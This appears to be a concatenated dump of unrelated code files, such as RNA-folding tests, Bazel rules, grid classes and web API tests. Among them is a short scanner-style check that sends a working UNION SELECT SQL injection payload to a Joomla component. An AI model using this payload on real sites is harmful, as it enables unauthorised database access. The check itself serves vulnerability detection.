self.assertAlmostEqual(d, ufold, delta=delta)
def test_multibranch(self):
"""Fold a multibranch structure."""
seq = "GGGAGGTCGTTACATCTGGGTAACACCGGTACTGATCCGGTGACCTCCC" # three branch
structs = fold(seq)
self.assertTrue(
any("BIFURCATION" in s.desc and (7, 41) in s.ij for s in structs)
)
def test_pair(self):
"""Create a pair for stack checking."""
seq = "ATGGAATAGTG"
self.assertEqual(_pair(seq, 0, 1, 9, 10), "AT/TG")
def test_stack(self):
"""Calc delta G of a stack."""
seq = "GCUCAGCUGGGAGAGC"
temp = 310.15
self.assertAlmostEqual(
_stack(seq, 1, 2, 14, 13, temp, RNA_ENERGIES), -2.1, delta=0.1
)
def test_bulge(self):
"""Calc delta G calc of a bulge."""
# mock bulge of CAT on one side and AG on other
# from pg 429 of SantaLucia, 2004
seq = "ACCCCCATCCTTCCTTGAGTCAAGGGGCTCAA"
pair_dg = _bulge(seq, 5, 7, 18, 17, 310.15, DNA_ENERGIES)
self.assertAlmostEqual(3.22, pair_dg, delta=0.4)
def test_hairpin(self):
"""Calc delta G of a hairpin structure."""
# hairpin = "CCTTGG"
seq = "ACCCCCTCCTTCCTTGGATCAAGGGGCTCAA"
i = 11
j = 16
temp = 310.15
hairpin_dg = _hairpin(seq, i, j, temp, DNA_ENERGIES)
# this differs from Unafold
self.assertAlmostEqual(hairpin_dg, 4.3, delta=1.0)
# from page 428 of SantaLucia, 2004
# hairpin = "CGCAAG"
seq = "ACCCGCAAGCCCTCCTTCCTTGGATCAAGGGGCTCAA"
i = 3
j = 8
hairpin_dg = _hairpin(seq, i, j, temp, DNA_ENERGIES)
self.assertAlmostEqual(0.67, hairpin_dg, delta=0.1)
seq = "CUUUGCACG"
i = 0
j = 8
hairpin_dg = _hairpin(seq, i, j, temp, RNA_ENERGIES)
self.assertAlmostEqual(4.5, hairpin_dg, delta=0.2)
def test_internal_loop(self):
"""Calc dg of an internal loop."""
seq = "ACCCCCTCCTTCCTTGGATCAAGGGGCTCAA"
i = 6
j = 21
temp = 310.15
dg = _internal_loop(seq, i, i + 4, j, j - 4, temp, DNA_ENERGIES)
self.assertAlmostEqual(dg, 3.5, delta=0.1)
def test_w(self):
"""Calculate _w over some range."""
seq = "GCUCAGCUGGGAGAGC"
i = 0
j = 15
temp = 310.15
v_cache = []
w_cache = []
for _ in range(len(seq)):
v_cache.append([STRUCT_DEFAULT] * len(seq))
w_cache.append([STRUCT_DEFAULT] * len(seq))
struct = _w(seq, i, j, temp, v_cache, w_cache, RNA_ENERGIES)
self.assertAlmostEqual(struct.e, -3.8, delta=0.2)
seq = "CCUGCUUUGCACGCAGG"
i = 0
j = 16
temp = 310.15
v_cache = []
w_cache = []
for _ in range(len(seq)):
v_cache.append([STRUCT_DEFAULT] * len(seq))
w_cache.append([STRUCT_DEFAULT] * len(seq))
struct = _w(seq, i, j, temp, v_cache, w_cache, RNA_ENERGIES)
self.assertAlmostEqual(struct.e, -6.4, delta=0.2)
seq = "GCGGUUCGAUCCCGC"
i = 0
j = 14
v_cache = []
w_cache = []
for _ in range(len(seq)):
v_cache.append([STRUCT_DEFAULT] * len(seq))
w_cache.append([STRUCT_DEFAULT] * len(seq))
struct = _w(seq, i, j, temp, v_cache, w_cache, RNA_ENERGIES)
self.assertAlmostEqual(struct.e, -4.2, delta=0.2)
def _debug(self, cache: Structs):
"""Log the contents of a Cache."""
rows = []
for row in cache:
rows.append(
",".join(str(s.ij).replace(",", "-") if s else "." for s in row)
)
rows.append("")
for row in cache:
rows.append(",".join(str(s.e) if s else "." for s in row))
rows.append("")
for row in cache:
rows.append(",".join(str(s.desc) if s else "." for s in row))
print("\n".join(rows))
|
load("@rules_proto//proto:defs.bzl", "ProtoInfo")
load(
"@io_bazel_rules_scala//scala_proto/private:scala_proto_aspect_provider.bzl",
"ScalaProtoAspectInfo",
)
load(
"@io_bazel_rules_scala//scala/private:phases/api.bzl",
"extras_phases",
"run_phases",
)
load("@bazel_skylib//lib:dicts.bzl", "dicts")
load("//scala_proto/private:scala_proto_aspect.bzl", "make_scala_proto_aspect")
def phase_merge_aspect_java_info(ctx, p):
java_info = java_common.merge([dep[ScalaProtoAspectInfo].java_info for dep in ctx.attr.deps])
return struct(
java_info = java_info,
external_providers = {
"JavaInfo": java_info,
},
)
def phase_default_info(ctx, p):
java_info = p.merge_aspects.java_info
return struct(
external_providers = {
"DefaultInfo": DefaultInfo(
files = depset(
java_info.source_jars,
transitive = [java_info.full_compile_jars],
),
),
},
)
def _scala_proto_library(ctx):
return run_phases(
ctx,
[
("merge_aspects", phase_merge_aspect_java_info),
("default_info", phase_default_info),
],
)
scala_proto_aspect = make_scala_proto_aspect()
def make_scala_proto_library(*extras, aspects = [scala_proto_aspect]):
attrs = {
"deps": attr.label_list(providers = [ProtoInfo], aspects = aspects),
}
return rule(
implementation = _scala_proto_library,
attrs = dicts.add(
attrs,
extras_phases(extras),
*[extra["attrs"] for extra in extras if "attrs" in extra]
),
fragments = ["java"],
provides = [DefaultInfo, JavaInfo],
)
scala_proto_library = make_scala_proto_library(
aspects = [
scala_proto_aspect,
],
)
|
from .data_augment import PairRandomCrop, PairCompose, PairRandomHorizontalFilp, PairToTensor
from .data_load import train_dataloader, test_dataloader, valid_dataloader
|
import argparse
from yaaf import Timestep
from openmdp.agents import QMDPAgent, MLSAgent, OptimalMDPPolicyAgent
from openmdp.scenarios import DuoNavigationPOMDP
def run(agent, pomdp, horizon, render=False):
fully_observable = agent.name == "Optimal MDP Policy"
state = pomdp.reset()
if not fully_observable:
agent.reset()
for step in range(horizon):
action = agent.action(state) if fully_observable else agent.action()
next_obs, reward, _, info = pomdp.step(action)
terminal = reward == 0.0
next_state = pomdp.state
timestep = Timestep(state, action, reward, next_state, terminal, info) if fully_observable else Timestep(None, action, reward, next_obs, terminal, info)
agent.reinforcement(timestep)
if render:
print(f"\n##########\nTimestep {step}\n##########\n")
pomdp.render()
print(f"State: {state} (y={pomdp.state_index(state)})")
print(f"Action: {pomdp.action_meanings[action]} (a={action})")
print(f"Next state: {next_state} (y={pomdp.state_index(next_state)})")
print(f"Next obs: {next_obs} (z={pomdp.observation_index(next_obs)})")
print(f"Reward: {reward}")
state = next_state
if terminal: break
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("agent", type=str, choices=["MLSAgent", "QMDPAgent", "ValueIteration"])
parser.add_argument("--horizon", default=10, type=int)
parser.add_argument("--render", action="store_true")
opt = parser.parse_args()
pomdp = DuoNavigationPOMDP()
if opt.agent == "MLSAgent": agent = MLSAgent(pomdp)
elif opt.agent == "ValueIteration": agent = OptimalMDPPolicyAgent(pomdp)
elif opt.agent == "QMDPAgent": agent = QMDPAgent(pomdp)
else: raise ValueError("Unreachable exception due to choices=[...] on argparse")
run(agent, pomdp, opt.horizon, opt.render)
|
"""
The MIT License (MIT)
Copyright (c) 2017 Marvin Teichmann
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import numpy as np
import scipy as scp
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.INFO,
stream=sys.stdout)
from pyvision.datasets import pascal
from pyvision.datasets.pascal import input_producer as pinput
def _assert_data_dir():
try:
os.environ['TV_DIR_DATA']
return True
except KeyError:
logging.warning("Data dir not given. Skipping all dataset tests.")
logging.info("Set $TV_DIR_DATA to perform additional tests.")
return False
pass
def test_pascal():
conf = pinput.default_conf()
if not _assert_data_dir():
pass
if not os.path.exists(os.environ['TV_DIR_DATA'] + "/VOC2012"):
logging.warning("Dir: {} does not exist."
.format(os.environ['TV_DIR_DATA'] + "/VOC2012"))
logging.info("Skipping pascal voc test.")
test = pinput.InputProducer(conf)
next(test)
if __name__ == '__main__':
logging.info("Hello World.")
|
class WellGrid:
"""Square grid class with regular spacing and well at grid center.
The default WellGrid object has radius gr=100 defining the square's
extent and grid density gd=21. An exception occurs if the grid radius is
not positive. Grid density defines the numbers of rows and columns
comprising the grid; thus, the default grid has 21 rows x 21 cols = 441
grid points. Minimum grid density is constrained to 11 (121 grid points)
and maximum grid density is constrained to 41 (1681 grid points). Values
for gd outside of these contraints are re-set to the minimum or maximum
values as appropriate.
The .pts property returns the grid points attriubutes including local
x-y coordinates, world x-y coordinates and radius values relative to the
well location. The .info method displays grid information and the .draw
method displays a plot of the grid in either local or world coordinates.
Attributes:
gr (float) : Radius defining the extent of the solution grid (units L,
default 100.0).
gd (int) : Grid density defining the number of rows and columns;
minimum and maximum constraints are enforced (default 21).
"""
from .wells import SteadyWell
def __init__(self, well=SteadyWell(), gr=100, gd=21):
self.well = well
self.gr = gr
self.gd = gd
self.max_gd = 41
self.min_gd = 11
@property
def gr(self):
"""float : Grid radius.
Setter method checks for valid values and triggers an exception if
invalid values are specified.
"""
return self._gr
@gr.setter
def gr(self, v):
if not (v > 0):
raise Exception('Grid radius must be greater than 0.')
self._gr = v
@property
def grdim(self):
"""int : Number of grid rows and columns."""
if self.gd < self.min_gd:
return self.min_gd
elif self.gd > self.max_gd:
return self.max_gd
else:
return int(self.gd)
@property
def npts(self):
"""int : Number of grid points."""
return self.grdim**2
@property
def pts(self):
"""pandas dataframe : grid point attriubutes including local grid
point coordinates, world grid point coordinates and radius values of
grid points relative to the well center.
"""
import pandas
import numpy
from pygaf.utils import add_constant_to_list
df = pandas.DataFrame()
row = list(numpy.linspace(-self.gr, self.gr, self.grdim))
rows = [row for _ in range(self.grdim)]
cols = [[row[i] for _ in range(self.grdim)] for i in range(self.grdim)]
df['locx'] = list(numpy.array(rows).flat)
df['locy'] = list(numpy.array(cols).flat)
df['worldx'] = add_constant_to_list(list(df.locx), self.well.x)
df['worldy'] = add_constant_to_list(list(df.locy), self.well.y)
df['rad'] = numpy.sqrt(df.locx**2 + df.locy**2)
return df
def info(self):
"""Print the well grid information."""
print('WELL GRID INFORMATION')
print('---------------------')
if self.npts == self.min_gd**2:
print('Notice! grid spacing has been increased to enforce the',
'minimum grid density of', self.min_gd**2, 'points.')
if self.npts == self.max_gd**2:
print('Notice! grid spacing has been decreased to enforce the',
'maximum grid density of', self.max_gd**2, 'points.')
print('Grid radius:', round(self.gr, 1))
print('Number of grid points:', self.npts)
print('Grid density:', self.grdim)
print()
return
def draw(self, local=False):
"""Draw the grid points.
Args:
local (bool) : Display the grid plot in local coordinates with
the well at 0, 0 (default False ).
"""
from matplotlib import pyplot as plt
fig, ax = plt.subplots(1, 1, figsize=(5, 5))
if local:
x, y = list(self.pts.locx), list(self.pts.locy)
cx, cy = 0, 0
title = 'Well Grid in Local Coordinates'
else:
x, y = list(self.pts.worldx), list(self.pts.worldy)
cx, cy = self.well.x, self.well.y
title = 'Well Grid'
ax.plot(x, y, '.', markersize=1, c='black')
ax.plot(cx, cy, '.', c='red')
ax.set_title(title)
ax.axis('equal')
plt.show()
return
class BasinGrid:
""" Square grid class with basin center at grid center.
The default BasinGrid object has radius gr=100 defining the square's extent
and grid density gd=21. An exception occurs if the grid radius is not
positive. Grid density defines the numbers of rows and columns comprising
the grid; thus, the default grid has 21 rows x 21 cols = 441 grid points.
Minimum grid density is constrained to 11 (121 grid points) and maximum
grid density is constrained to 41 (1681 grid points). Values for gd outside
of these contraints are re-set to the minimum or maximum values as
appropriate.
The .pts property returns the grid points attriubutes including local
x-y coordinates and world x-y coordinates. The .info method displays grid
information and the .draw method displays a plot of the grid in either
local or world coordinates.
Attributes:
gr (float) : Radius defining the extent of the solution grid (units L,
default 100.0).
gd (int) : Grid density defining the number of rows and columns;
minimum and maximum constraints are enforced (default 21).
"""
from .basins import Basin
def __init__(self, basin=Basin(), gr=100, gd=21):
self.basin = basin
self.gr = gr
self.gd = gd
self.max_gd = 41
self.min_gd = 11
@property
def gr(self):
"""float : Grid radius.
Setter method checks for valid values and triggers an exception if
invalid values are specified.
"""
return self._gr
@gr.setter
def gr(self, v):
if not (v > 0):
raise Exception('Grid radius must be greater than 0.')
self._gr = v
@property
def grdim(self):
"""int : Number of grid rows and columns."""
if self.gd < self.min_gd:
return self.min_gd
elif self.gd > self.max_gd:
return self.max_gd
else:
return int(self.gd)
@property
def npts(self):
"""int : Number of grid points."""
return self.grdim**2
@property
def pts(self):
"""pandas dataframe : grid point attriubutes including local grid
point coordinates and world grid point coordinates.
"""
import pandas
import numpy
from pygaf.utils import add_constant_to_list
from pygaf.utils import rotate_grid
df = pandas.DataFrame()
row = list(numpy.linspace(-self.gr, self.gr, self.grdim))
rows = [row for _ in range(self.grdim)]
cols = [[row[i] for _ in range(self.grdim)] for i in range(self.grdim)]
df['locx'] = list(numpy.array(rows).flat)
df['locy'] = list(numpy.array(cols).flat)
df['rotx'], df['roty'] = rotate_grid(
0, 0, list(df.locx), list(df.locy), self.basin.rot_rad
)
df['worldx'] = add_constant_to_list(list(df.rotx), self.basin.cx)
df['worldy'] = add_constant_to_list(list(df.roty), self.basin.cy)
df['dx'] = list(df.locx)
df['dy'] = list(df.locy)
return df
def info(self):
"""Print the basin grid information."""
print('BASIN GRID INFORMATION')
print('----------------------')
if self.npts == self.min_gd**2:
print('Notice! grid spacing has been increased to enforce the',
'minimum grid density of', self.min_gd**2, 'points.')
if self.npts == self.max_gd**2:
print('Notice! grid spacing has been decreased to enforce the',
'maximum grid density of', self.max_gd**2, 'points.')
print('Grid radius:', round(self.gr, 1))
print('Number of grid points:', self.npts)
print('Grid density:', self.grdim)
print()
return
def draw(self, local=False):
"""Draw the grid points.
Args:
local (bool) : Display the grid plot in local coordinates with
the well at 0, 0 (default False).
"""
from matplotlib import pyplot as plt
fig, ax = plt.subplots(1, 1, figsize=(5, 5))
if local:
x, y = list(self.pts.locx), list(self.pts.locy)
cx, cy = 0, 0
title = 'Basin Grid in Local Coordinates'
else:
x, y = list(self.pts.worldx), list(self.pts.worldy)
cx, cy = self.basin.cx, self.basin.cy
title = 'Basin Grid'
ax.plot(x, y, '.', markersize=1, c='black')
ax.plot(cx, cy, '.', c='red')
ax.set_title(title)
ax.axis('equal')
plt.show()
return
|
"""Tests for VM actions called via WebTest
$ ~/eoscloud-venv/bin/python3 -m unittest eos_db.test.test_vm_actions_http
"""
import os
import unittest
from eos_db import server
from webtest import TestApp
from pyramid.paster import get_app
from http.cookiejar import DefaultCookiePolicy
# These states should be settable without any side-effects.
STATES_TO_TEST = [
'Starting',
'Stopping',
'Restarting',
'Pre_Deboosted',
'Deboosting',
'Started',
'Stopped',
'Prepared',
'Boosting',
]
# Depend on test.ini in the same dir as this file.
test_ini = os.path.join(os.path.dirname(__file__), 'test.ini')
class TestVMActionsHTTP(unittest.TestCase):
"""Tests API functions associated with VM actions.
Note that all tests are in-process, we don't actually start a HTTP server,
but we do communicate HTTP requests and responses.
Outside of setUp, all calls to the database should be via the HTTP API.
"""
def setUp(self):
"""Launch pserve using webtest with test settings"""
self.appconf = get_app(test_ini)
self.app = TestApp(self.appconf)
#For speed, allow cookie setting.
# self.app.cookiejar.set_policy(DefaultCookiePolicy(allowed_domains=[]))
# This sets global var "engine" - in the case of SQLite this is a fresh RAM
# DB each time. If we only did this on class instantiation the database would
# be dirty and one test could influence another.
# TODO - add a test that tests this.
server.choose_engine("SQLite")
# Punch in new administrator account with direct server call
# This will implicitly generate the tables.
user_id = server.create_user("administrators", "administrator", "administrator", "administrator")
#server.touch_to_add_user_group("administrator", "administrators")
server.touch_to_add_password(user_id, "adminpass")
self.app.authorization = ('Basic', ('administrator', 'adminpass'))
# This sorts out the auth token cookie.
self.app.get('/users')
self.app.authorization = None
"""VM-related API functions."""
def test_create_own_retrieve_servers(self): # FIX
""" Create a server. Ensure that a 200 OK response results.
Add an owner to a server. Ensure that a 200 OK response results.
A user can request a list of servers that they own. An
administrator can list all the servers. """
# Create user and server
self.create_user("testuser")
self.create_server("testserver")
# Add ownership
response = self.app.put('/servers/testserver/owner',
{'artifact_id': 'testserver',
'actor_id': 'bcollier'})
# Get server
response = self.app.get('/servers/testserver',
{'hostname': 'testserver'})
# Get server ownership - !! Not implemented
# FIXME
#
# response = self.app.get('/servers/testserver/owner',
# {'artifact_id': 'testserver'})
""" Server State-Change Functions. """
def test_server_states(self):
""" Check that a server appears in various states after using the
relevant API call. This also tests the function 'retrieve_servers_in_state'.
"""
# Create server
sid = self.create_server("testserver")
def get_state():
response = self.app.get('/servers/testserver/state')
return response.json
#All the states listed should simply add a touch and succeed without drama.
for state in STATES_TO_TEST:
res = self.app.post('/servers/testserver/' + state)
#print("Push result = " + str(res))
self.assertEqual(get_state(), state)
#Also confirm this works by ID
resp2 = self.app.get('/servers/by_id/%s/state' % sid)
self.assertEqual(resp2.json, STATES_TO_TEST[-1])
def test_retrieve_server(self):
""" Pull back details of our server by name. """
self.create_server("testserver") # Create server
# Retrieve server details
response = self.app.get('/servers/testserver',
{'hostname': 'testserver'})
def test_retrieve_server_by_id(self):
""" Our server will have ID 1. Check that we can retrieve details of
it.
"""
sid = self.create_server("testserver") # Create server
# Retrieve server details by name
self.assertEqual(sid, 1)
response = self.app.get('/servers/by_id/1')
# def test_update_server(self):
# """ Not currently implemented. """
#
# self.create_server("testserver") # Create server
# Update server details
# Check server details
# def test_delete_server(self):
# """ Not currently implemented. """
def test_set_get_server_specification(self):
""" Follows hard-coded rules for machine behaviour.
Set machine CPUs to 2. Check, should pass.
Set machine CPUs to 65000. Check, should fail.
Set machine RAM to 16. Check, should pass.
Set machine RAM to 65000. Check, should fail.
Check that machine RAM and Cores are 2 and 16 as above. """
self.create_server("testserver") # Create server
# Set server spec
response = self.app.post('/servers/testserver/specification',
{'name': 'testserver',
'cores': 2,
'ram': 16 },
status=200,
expect_errors=False)
response = self.app.post('/servers/testserver/specification',
{'name': 'testserver',
'cores': 65000,
'ram': 65000 },
status=400,
expect_errors=False)
# Get server spec
response = self.app.get('/servers/testserver/specification',
{'hostname': 'testserver'},
status=200,
expect_errors=False)
def test_retrieve_servers_by_state(self):
""" The agents need to find out about servers to be acted on.
Test for states/XXX
"""
app = self.app
self.create_server("testserver1")
self.create_server("testserver2")
app.post('/servers/testserver1/Stopping')
app.post('/servers/testserver2/Stopping')
res1 = app.get('/states/Stopping')
self.assertEqual(res1.json,
[{"artifact_id":1, "artifact_uuid":"testserver1", "artifact_name":"testserver1"},
{"artifact_id":2, "artifact_uuid":"testserver2", "artifact_name":"testserver2"}]
)
#And after changing states around
self.create_server("testserver3")
app.post('/servers/testserver3/Stopping')
app.post('/servers/testserver2/Starting')
app.post('/servers/testserver3/Starting')
app.post('/servers/testserver2/Stopping')
res2 = app.get('/states/Stopping')
self.assertEqual(res2.json,
[{"artifact_id":1, "artifact_uuid":"testserver1", "artifact_name":"testserver1"},
{"artifact_id":2, "artifact_uuid":"testserver2", "artifact_name":"testserver2"}]
)
def test_retrieve_job_progress(self):
""" Not currently implemented. """
def test_retrieve_server_touches(self):
""" Not currently implemented. """
def test_retrieve_state_summary(self):
""" Test for /states
"""
app = self.app
# Generate base status table
status_table = { s : 0 for s in server.get_state_list() }
r = app.get("/states")
self.assertEqual(r.json, status_table)
for n in range(1, 6):
self.create_server("testserver%i" % n)
app.post('/servers/testserver1/Stopping')
app.post('/servers/testserver2/Stopping')
app.post('/servers/testserver3/Stopping')
app.post('/servers/testserver4/Started')
app.post('/servers/testserver5/Starting')
# Test1 - servers set to only one state.
st1 = status_table.copy()
st1['Stopping'] = 3
st1['Started'] = 1
st1['Starting'] = 1
r = app.get("/states")
self.assertEqual(r.json, st1)
# Test2 - server states have been changed
app.post('/servers/testserver3/Started')
app.post('/servers/testserver3/Stopping')
app.post('/servers/testserver4/Stopping')
app.post('/servers/testserver3/Starting')
st2 = status_table.copy()
st2['Stopping'] = 3
st2['Started'] = 0
st2['Starting'] = 2
r = app.get("/states")
self.assertEqual(r.json, st2)
###############################################################################
# Support Functions, calling server admin views #
###############################################################################
def create_user(self, name):
response = self.app.put('/users/' + name,
{'type': 'users',
'handle': name + '@example.com',
'name': name + " " + name,
'username': name},
status=200,
expect_errors=False)
def create_server(self, name):
return self.app.put('/servers/' + name,
{'hostname': name, 'uuid': name },
status=200,
expect_errors=False).json
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'pyphrb'
def assign(service, arg):
if service == "joomla":
return True, arg
def audit(arg):
url = arg
_, head, body, _, _ = curl.curl(url + '/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,0x3a,md5(3.1415),0x3a),3,4,5,6,7,8,9')
if body and body.find('63e1f04640e83605c1d177544a5a0488') != -1:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('joomla', 'http://www.example.com/')[1])
|
import logging
from unittest import mock
from .common import generate_msg
from pypeman.message import Message
from pypeman.test import TearDownProjectTestCase as TestCase
class MessageTests(TestCase):
def test_message_dict_conversion(self):
m = generate_msg(message_content={'answer': 42}, with_context=True)
mdict = m.to_dict()
self.assertTrue(isinstance(mdict, dict), "Message as_dict method is broken")
compare_to = Message.from_dict(mdict)
self.assertEqual(m.payload['answer'], compare_to.payload['answer'], "Payload not well decoded")
self.assertEqual(m.uuid, compare_to.uuid, "Bad uuid")
self.assertEqual(m.meta['question'], compare_to.meta['question'], "Bad meta")
self.assertEqual(
m.ctx['test']['payload']['question'],
compare_to.ctx['test']['payload']['question'], "Bad ctx")
self.assertEqual(
m.ctx['test']['meta']['answer'],
compare_to.ctx['test']['meta']['answer'], "Bad ctx")
def test_message_json_conversion(self):
m = generate_msg(message_content={'answer': 42}, with_context=True)
msg_json = m.to_json()
compare_to = Message.from_json(msg_json)
self.assertEqual(m.payload['answer'], compare_to.payload['answer'], "Payload not well decoded")
self.assertEqual(m.uuid, compare_to.uuid, "Bad uuid")
self.assertEqual(m.meta['question'], compare_to.meta['question'], "Bad meta")
self.assertEqual(
m.ctx['test']['payload']['question'],
compare_to.ctx['test']['payload']['question'], "Bad ctx")
self.assertEqual(
m.ctx['test']['meta']['answer'],
compare_to.ctx['test']['meta']['answer'], "Bad ctx")
def test_message_copy(self):
m = generate_msg(message_content={'answer': 42}, with_context=True)
compare_to = m.copy()
self.assertEqual(m.payload['answer'], compare_to.payload['answer'], "Payload not well copied")
self.assertEqual(m.uuid, compare_to.uuid, "Bad uuid copy")
self.assertEqual(m.meta['question'], compare_to.meta['question'], "Bad meta copy")
self.assertEqual(
m.ctx['test']['payload']['question'],
compare_to.ctx['test']['payload']['question'], "Bad ctx copy")
self.assertEqual(
m.ctx['test']['meta']['answer'],
compare_to.ctx['test']['meta']['answer'], "Bad ctx")
def test_message_renew(self):
m = generate_msg(message_content={'answer': 42}, with_context=True)
compare_to = m.renew()
self.assertEqual(m.payload['answer'], compare_to.payload['answer'], "Payload not well copied")
self.assertNotEqual(m.uuid, compare_to.uuid, "Uuid should not be copied")
self.assertNotEqual(m.timestamp, compare_to.timestamp, "Timestamp should not be copied")
self.assertEqual(m.meta['question'],
compare_to.meta['question'], "Bad meta copy")
self.assertEqual(
m.ctx['test']['payload']['question'],
compare_to.ctx['test']['payload']['question'], "Bad ctx copy")
self.assertEqual(m.ctx['test']['meta']['answer'],
compare_to.ctx['test']['meta']['answer'], "Bad ctx")
def test_message_logging(self):
"""
Whether message logging is working well.
"""
m = generate_msg(message_content={'answer': 42}, with_context=True)
mock_logger = mock.MagicMock()
m.log(logger=mock_logger)
mock_logger.log.assert_called_with(logging.DEBUG, 'Meta: %r', {'question': 'unknown'})
mock_logger.reset()
m.log(logger=mock_logger, payload=True, meta=True, context=True, log_level=logging.INFO)
mock_logger.log.assert_called_with(logging.INFO, 'Meta: %r', {'answer': 43})
def test_message_print(self):
"""
Whether message print version is working well.
"""
m = generate_msg(
message_content={'answer': 42},
with_context=True,
timestamp=(2010, 10, 10, 10, 10, 10),
)
m.uuid = "msguuid"
result = m.to_print(context=True)
reference = """Message msguuid
Date: 2010-10-10 10:10:10
Payload: {'answer': 42}
Meta: {'question': 'unknown'}
Context for message ->
-- Key "test" --
Payload: {'question': 'known'}
Meta: {'answer': 43}
"""
self.assertEqual(result, reference, "Print message not working")
|
# Factory test suit
from silhouette.factory import *
def test_render_file_paths():
src_paths = ["/home/ubuntu/project/$name$/$module$/readme.md", "/home/ubuntu/project/$name$/$module$/jenkinsfile"]
vars = {"name": "flask", "module": "example"}
result = render_file_paths(src_paths, vars)
assert('/home/ubuntu/project/flask/example/readme.md' in result)
assert('/home/ubuntu/project/flask/example/jenkinsfile' in result)
|
from unittest import TestCase
from scripts.helpers import hash_password
class TestExample(TestCase):
def test_mytest(self):
self.assertTrue(True)
|
"""
python file object library
"""
# imports python
import json
import imp
import cPickle
# imports local
from . import _generic
# PYTHON FILE OBJECTS #
class JsonFile(_generic.File):
"""file object that manipulate a ``.json`` file on the file system
"""
# ATTRIBUTES #
_extension = 'json'
# OBJECT COMMANDS #
@classmethod
def create(cls, path, content=None, **__):
"""create a json file
:param path: path of the json file
:type path: str
:param content: content of the json file
:type content: any
:return: the created json file
:rtype: :class:`cgp_generic_utils.files.JsonFile`
"""
# errors
if not _generic.Path(path).extension() == cls._extension:
raise ValueError('{0} is not a JsonFile path'.format(path))
# get content
content = content or {}
# execute
with open(path, 'w') as toWrite:
json.dump(content, toWrite, indent=4)
# return
return cls(path)
# COMMANDS #
def read(self):
"""read the json file
:return: the content of the json file
:rtype: any
"""
# get state form config file
with open(self.path(), 'r') as toRead:
data = json.load(toRead)
# return
return data
class PklFile(_generic.File):
"""file object that manipulate a ``.pkl`` file on the file system
"""
# ATTRIBUTES #
_extension = 'pkl'
# OBJECT COMMANDS #
@classmethod
def create(cls, path, content=None, **__):
"""create a pkl file
:param path: path of the pkl file
:type path: str
:param content: content of the pkl file
:type content: any
:return: the created pkl file
:rtype: :class:`cgp_generic_utils.files.PklFile`
"""
# errors
if not _generic.Path(path).extension() == cls._extension:
raise ValueError('{0} is not a PklFile path'.format(path))
# get content
content = content or {}
# execute
with open(path, 'wb') as toWrite:
cPickle.dump(content, toWrite)
# return
return cls(path)
# COMMANDS #
def read(self):
"""read the pkl file
:return: the content of the pkl file
:rtype: any
"""
# get state form config file
with open(self.path(), 'rb') as toRead:
data = cPickle.load(toRead)
# return
return data
class PyFile(_generic.File):
"""file object that manipulates a ``.py`` file on the file system
"""
# ATTRIBUTES #
_extension = 'py'
# COMMANDS #
def importAsModule(self):
"""import the python file as module
:return: the module object
:rtype: python
"""
# import as module
module = imp.load_source(self.baseName(withExtension=False), self.path())
# return
return module
|
def main():
from pyperclip import copy as cpy
import pyautogui
from time import sleep
def gg():
sleep(3)
cpy('!p gooba earrape')
pyautogui.hotkey('ctrl', 'v')
pyautogui.press('enter')
cpy('-p gooba earrape')
pyautogui.hotkey('ctrl', 'v')
pyautogui.press('enter')
cpy('!loop')
pyautogui.hotkey('ctrl', 'v')
pyautogui.press('enter')
cpy('-loop')
pyautogui.hotkey('ctrl', 'v')
pyautogui.press('enter')
gg()
if __name__ == '__main__':
main()
|
def alphabet_war(fight):
|
import hy
import main
def run():
parts = {"head": "O", "torso": "|", "l_arm": "-", "r_arm": "-", "l_leg": "/", "r_leg": "\\"}
print(main.game_loop({"lives": 6, "word": "hangman".lower(), "guess": [], "body": {}, "parts": parts, "letters": []}))
if __name__ == '__main__':
run()
while input('Replay? Y/N: ').lower() == 'y':
run()
|
# Import numpy as np
import numpy as np
# Calculate the portfolio standard deviation
portfolio_volatility = np.sqrt(np.dot(portfolio_weights.T, np.dot(cov_mat_annual, portfolio_weights)))
print(portfolio_volatility)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.